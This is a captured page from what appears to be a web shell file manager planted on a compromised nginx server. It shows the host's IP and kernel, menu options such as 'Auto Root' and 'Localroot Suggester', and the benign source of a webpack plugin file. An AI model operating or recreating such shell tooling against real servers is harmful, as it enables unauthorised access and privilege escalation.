Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.119.103.13
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
webpack /
lib /
esm /
Delete
Unzip
Name
Size
Permission
Date
Action
ExportWebpackRequireRuntimeModule.js
577
B
-rw-rw-r--
2022-08-30 11:49
ModuleChunkFormatPlugin.js
5.92
KB
-rw-rw-r--
2022-08-30 11:49
ModuleChunkLoadingPlugin.js
2.46
KB
-rw-rw-r--
2022-08-30 11:49
ModuleChunkLoadingRuntimeModule.js
7.51
KB
-rw-rw-r--
2022-08-30 11:49
Save
Rename
/* MIT License http://www.opensource.org/licenses/mit-license.php Author Tobias Koppers @sokra */ "use strict"; const RuntimeGlobals = require("../RuntimeGlobals"); const ExportWebpackRequireRuntimeModule = require("./ExportWebpackRequireRuntimeModule"); const ModuleChunkLoadingRuntimeModule = require("./ModuleChunkLoadingRuntimeModule"); /** @typedef {import("../Compiler")} Compiler */ class ModuleChunkLoadingPlugin { /** * Apply the plugin * @param {Compiler} compiler the compiler instance * @returns {void} */ apply(compiler) { compiler.hooks.thisCompilation.tap( "ModuleChunkLoadingPlugin", compilation => { const globalChunkLoading = compilation.outputOptions.chunkLoading; const isEnabledForChunk = chunk => { const options = chunk.getEntryOptions(); const chunkLoading = (options && options.chunkLoading) || globalChunkLoading; return chunkLoading === "import"; }; const onceForChunkSet = new WeakSet(); const handler = (chunk, set) => { if (onceForChunkSet.has(chunk)) return; onceForChunkSet.add(chunk); if (!isEnabledForChunk(chunk)) return; set.add(RuntimeGlobals.moduleFactoriesAddOnly); set.add(RuntimeGlobals.hasOwnProperty); compilation.addRuntimeModule( chunk, new ModuleChunkLoadingRuntimeModule(set) ); }; compilation.hooks.runtimeRequirementInTree .for(RuntimeGlobals.ensureChunkHandlers) .tap("ModuleChunkLoadingPlugin", handler); compilation.hooks.runtimeRequirementInTree .for(RuntimeGlobals.baseURI) .tap("ModuleChunkLoadingPlugin", handler); compilation.hooks.runtimeRequirementInTree .for(RuntimeGlobals.externalInstallChunk) .tap("ModuleChunkLoadingPlugin", handler); compilation.hooks.runtimeRequirementInTree .for(RuntimeGlobals.onChunksLoaded) .tap("ModuleChunkLoadingPlugin", handler); compilation.hooks.runtimeRequirementInTree .for(RuntimeGlobals.externalInstallChunk) .tap("ModuleChunkLoadingPlugin", (chunk, set) => { if (!isEnabledForChunk(chunk)) return; compilation.addRuntimeModule( chunk, new ExportWebpackRequireRuntimeModule() ); }); compilation.hooks.runtimeRequirementInTree .for(RuntimeGlobals.ensureChunkHandlers) .tap("ModuleChunkLoadingPlugin", (chunk, set) => { if (!isEnabledForChunk(chunk)) return; set.add(RuntimeGlobals.getChunkScriptFilename); }); } ); } } module.exports = ModuleChunkLoadingPlugin;